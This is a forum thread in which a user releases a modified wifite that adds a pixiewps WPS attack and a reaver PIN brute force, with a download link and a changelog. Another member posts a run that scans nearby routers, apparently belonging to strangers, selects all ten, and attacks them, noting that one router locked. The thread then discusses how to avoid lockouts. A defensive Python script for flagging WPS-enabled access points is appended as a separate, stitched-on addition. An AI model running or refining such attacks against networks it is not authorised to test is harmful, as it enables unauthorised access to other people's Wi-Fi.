
Thread: Wifite including new pixiewps attack

  1. #1 (Senior Member, joined Mar 2015, 138 posts)

    Wifite including new pixiewps attack

    Figured I would just make it its own thread so it doesn't get lost in everything else.
    Let me know if there are any problems or ideas; I'm still kinda playing around with this and a few other ideas I kinda want to add.

    REQUIRES: pixiewps and t6x's modified reaver must be installed.

    ADDED: Support for the new pixiewps attack. It attempts a pixiewps attack and, if successful, passes the key to reaver to test. If it fails, it continues with the 11,000-key brute force with reaver.
    Now reports if WPS is locked in the scanning window (annoyed the excrement out of me that this wasn't shown).

    ToDo: Maybe add some default pin calculations and checking.
    Make attacks a little more chipset specific (like attempting pin 42000648 on known vulnerable routers, etc...).
    Add option to mdk3 the poopies out of the AP in hopes of resetting it (can't hurt).
    Add a dummy-check to not bork out if modified reaver or pixiewps isn't installed... :-/

    Changelog:
    04202015 - added timeout to script to avoid hanging if ap doesn't respond
    added flag -pixiet <sec> #adjust timeout of pixie attack
    added flag -ponly #only use pixiewps attack on selected wps networks,
    fixed ctrl^c issue, will now ask to continue or exit completely
    04212015 - added option to skip psk retrieval upon successful pixiewps attack, now runs reaver by default
    04222015 - added updater just run ./wifite -update to update to this fork instead of original wifite
    fixed timer
    fixed issue with new airmon-ng not creating monitor interface
    04232015 - fixed -mac not really anonymizing mac address
    added -endless flag to loop through targets
    made cracked.txt human readable (tab delimited instead of chr(0))
    fixed issue with -paddto not working
    can now anonymize iface already in monitor mode(via macchanger)

    Download:

    https://github.com/aanarchyy/wifite-mod-pixiewps
    Last edited by aanarchyy; 2015-04-24 at 02:34 AM.

  2. #2 (Senior Member, joined Mar 2015, 127 posts)
    Nice, glad you added the new pixie attacks. Wifite is a great program. Used it exclusively until pixiewps and the new reavers came out. Then I had to use the command line more.

    Wifite is also one of the few programs that handles the new airmon-ng well.
    new airmon-ng example:
    airmon-ng wlan3 = wlan3mon (not mon0)

    I'm out at the moment, but wifite definitely worked when the new airmon-ng had already created the new monitor interface, then run wifite. Can't remember if it could create and use the monitor interface of the new airmon-ng from the beginning. I'll report back.

    I'll test this new version for both cases when I get home.

  3. #3 (Senior Member, joined Mar 2015, 138 posts)
    Quote Originally Posted by nuroo:
    Nice, glad you added the new pixie attacks. Wifite is a great program. Used it exclusively until pixiewps and the new reavers came out. Then I had to use the command line more.

    Wifite is also one of the few programs that handles the new airmon-ng well.
    new airmon-ng example:
    airmon-ng wlan3 = wlan3mon (not mon0)

    I'm out at the moment, but wifite definitely worked when the new airmon-ng had already created the new monitor interface, then run wifite. Can't remember if it could create and use the monitor interface of the new airmon-ng from the beginning. I'll report back.

    I'll test this new version for both cases when I get home.
    Let me know how it works; if it doesn't, then I should be able to fix it. I haven't updated aircrack to test it yet, but if it worked in wifite before, it should now also. I am obviously not the author nor even a contributor to wifite; this is just my own little 'fork' that I have found very useful for myself, and I am releasing it in case it is useful for anyone else.
    Last edited by aanarchyy; 2015-04-20 at 12:20 AM.

  4. #4 (Senior Member, joined Mar 2015, 127 posts)
    Can confirm the modified script works if monitor mode is already running. The script picks up wlan3mon right away and does its thing. If the monitor interface is not running, the script creates it. But since airmon-ng no longer produces mon0, it gets stuck in a loop.

    This is only a problem for those that upgraded the aircrack-ng suite. I'm sure it's flawless for everyone else.

  5. #5 (Senior Member, joined Mar 2015, 138 posts)
    Quote Originally Posted by nuroo:
    Can confirm the modified script works if monitor mode is already running. The script picks up wlan3mon right away and does its thing. If the monitor interface is not running, the script creates it. But since airmon-ng no longer produces mon0, it gets stuck in a loop.

    This is only a problem for those that upgraded the aircrack-ng suite. I'm sure it's flawless for everyone else.
    Will see if I can fix the monitor creation part of it; like I said, not the original creator of wifite ;-)
    Can you confirm the pixiewps portion I added works?

  6. #6 (Senior Member, joined Mar 2015, 127 posts)
    I had a hard time running it at first. The original wifite gets run, even if you run from the downloaded directory. I renamed the original and went back to the download directory and yours ran.

    I can confirm the pixiewps portion does work.

    Ctrl-C doesn't function like the old script, however. For instance, if attacking 10 targets and I Ctrl-C on the 3rd target, the script ends. It doesn't target the 4th, or give the option to continue.

    I would like some timeouts for the pixie attack. Needed: reaver will wait a long time for beacons, and the whole script hangs.

  7. #7 (Senior Member, joined Mar 2015, 138 posts)
    Quote Originally Posted by nuroo:
    I had a hard time running it at first. The original wifite gets run, even if you run from the downloaded directory. I renamed the original and went back to the download directory and yours ran.

    I can confirm the pixiewps portion does work.

    Ctrl-C doesn't function like the old script, however. For instance, if attacking 10 targets and I Ctrl-C on the 3rd target, the script ends. It doesn't target the 4th, or give the option to continue.

    I would like some timeouts for the pixie attack. Needed: reaver will wait a long time for beacons, and the whole script hangs.
    Yeah, the Ctrl-C part I have already noticed also and it is on my list; still trying to figure out how the whole script meshes together.
    And yeah, I also noticed the hang while waiting for a beacon. A timeout is a good idea; I'll look for a way to put that in.

    Thanks for helping me test this

    EDIT: Updated wifite to now time out after 60 seconds (may make this configurable in the future) if pixiewps is not successful and move on to a regular reaver brute force. Though chances are that if the pixiewps attack fails, more than likely it's a reception/lockout issue in which a regular reaver brute-force attack would also fail.

    Bear with me, kinda learning python as I do this.
    Last edited by aanarchyy; 2015-04-20 at 05:33 AM.

  8. #8
    Quote Originally Posted by aanarchyy:
    Will see if I can fix the monitor creation part of it; like I said, not the original creator of wifite ;-)
    Can you confirm the pixiewps portion I added works?
    Have you fixed it yet?

  9. #9 (Senior Member, joined Mar 2015, 127 posts)
    Good news aanarchyy. I'm happy to help. Awesome job so far. I wanna learn scripting too; for now I'll help test.

    Will try new version, report back.

  10. #10 (Senior Member, joined Mar 2015, 127 posts)
    Just so I can run the original and your wifite, I renamed yours wifitemod:

    Here's the output with the new version with the pixiewps timeout:
    Code:
    ~/wifite-mod-pixiewps-master# ./wifitemod -wps
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r85)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy(aanarchyy@gmail.com)
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] targeting WPS-enabled networks
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  36db   Locked 
        2  FiOS-S****             1  WPA2  23db   wps 
        3  SprintGatew****      1  WPA2  21db   wps 
    
     [0:00:32] scanning wireless networks. 3 targets and 2 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 47 non-WPS-enabled targets
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  36db   Locked 
        2  TG167****             11  WPA2  25db   wps 
        3  FiOS-S****             1  WPA2  24db   wps 
        4  TDS                    6  WPA2  22db   wps 
        5  TG167****              1  WPA2  21db   wps 
        6  MiamiHEAT             11  WPA2  20db   wps 
        7  U10C0****             1  WPA   18db   wps 
        8  SprintGate****      1  WPA2  18db   wps 
        9  DIRECT-pm-BR****       1  WPA2  18db   wps 
       10  DG167****              1  WPA2  15db   wps 
    
     [+] select target numbers (1-10) separated by commas, or 'all': all
    
     [+] 10 targets selected.
    
     [0:00:00] initializing PixieWPS attack on DG167**** (...........:73:90)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
    
     [!] unable to complete successful try in 60 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (...........:73:90)
    ^C0:00:18] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 9 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TG167**** (...........:EC:10)
    
     [!] unable to complete successful try in 60 seconds
     [+] skipping pixiewps on TG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TG167**** (...........:EC:10)
    ^C0:00:22] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 8 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on FiOS-S**** (...........:EC:C2)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
     [+] E-Hash1 found
     [+] E-Hash2 found
    Traceback (most recent call last):
      File "./wifitemod", line 3124, in <module>
        main()
      File "./wifitemod", line 321, in main
        need_handshake = not wps_attack(iface, t)
      File "./wifitemod", line 2912, in wps_attack
        line = f.readline()
    UnboundLocalError: local variable 'f' referenced before assignment
    Timeout for pixie worked, but another error above.
    Please make the pixie timeout configurable.
    Also an option: if pixiewps fails, no brute force, move to the next target.
    Please consider, because the failed attempt locked the router.
    Code:
    For those wondering what reaver's -P option is intended for:
    
    Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
    This option was made with intent of:
    
    ----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets, routers etc..
    
    ----Time sensitive attacks where the hash collecting continues repetitively until your time frame is met.
    
    ----For scripting purposes of those who want to use a possible lockout preventable way of PixieHash gathering for your use case.
    by datahead
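As an added example (not part of this thread or of the wifite fork), here is a small defender-side audit script that parses the scan table wifite prints in the output above and flags every access point on your own network that is still advertising WPS, which is the exposure the thread's reaver and pixiewps flow depends on. The sample table is constructed from the masked rows in the post plus one invented non-WPS row, the row regex and the severity scale are my own assumptions, and "Locked" is treated as still-exposed because the lockout is a rate limit, not WPS being disabled.

```python
import re

# Constructed sample in the column layout of wifite's scan table (NUM, ESSID,
# CH, ENCR, POWER, WPS?); masked ESSIDs mirror the post, last row is invented.
SCAN_TABLE = """\
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DG167****              1  WPA2  36db   Locked
    2  TG167****             11  WPA2  25db   wps
    7  U10C0****              1  WPA   18db   wps
    9  DIRECT-pm-BR****       1  WPA2  18db   wps
   10  Guest-Lab              6  WPA2  12db
"""

# One data row (assumed layout). The trailing "db" on POWER anchors the ESSID,
# which may itself contain spaces or digits; WPS? is "wps", "Locked" or absent.
ROW = re.compile(
    r"^\s*(?P<num>\d+)\s+(?P<essid>.+?)\s+(?P<ch>\d+)\s+(?P<encr>\S+)\s+"
    r"(?P<power>\d+)db(?:\s+(?P<wps>wps|Locked))?\s*$"
)


def parse_scan(text):
    """Return one dict per AP row; header and separator lines do not match ROW."""
    aps = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            ap = m.groupdict()
            for key in ("num", "ch", "power"):
                ap[key] = int(ap[key])
            aps.append(ap)  # ap["wps"] is None when the column is empty
    return aps


def wps_findings(aps):
    """(essid, severity, reason) for each AP still advertising WPS. Severity is
    this example's own scale: "wps" means the AP answers WPS and is exposed to
    the PIN brute force / pixie-dust flow discussed in the thread; "Locked"
    means it is rate-limiting right now, not that WPS is off."""
    findings = []
    for ap in aps:
        if ap["wps"] == "wps":
            findings.append((ap["essid"], "high",
                             "WPS enabled and responding; disable WPS on the AP"))
        elif ap["wps"] == "Locked":
            findings.append((ap["essid"], "medium",
                             "WPS enabled but currently locked; still disable WPS"))
    return findings
```

Run `wps_findings(parse_scan(SCAN_TABLE))` to get the flagged list; feed it the real table copied from a wifite run against your own network to see which APs still need WPS turned off.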
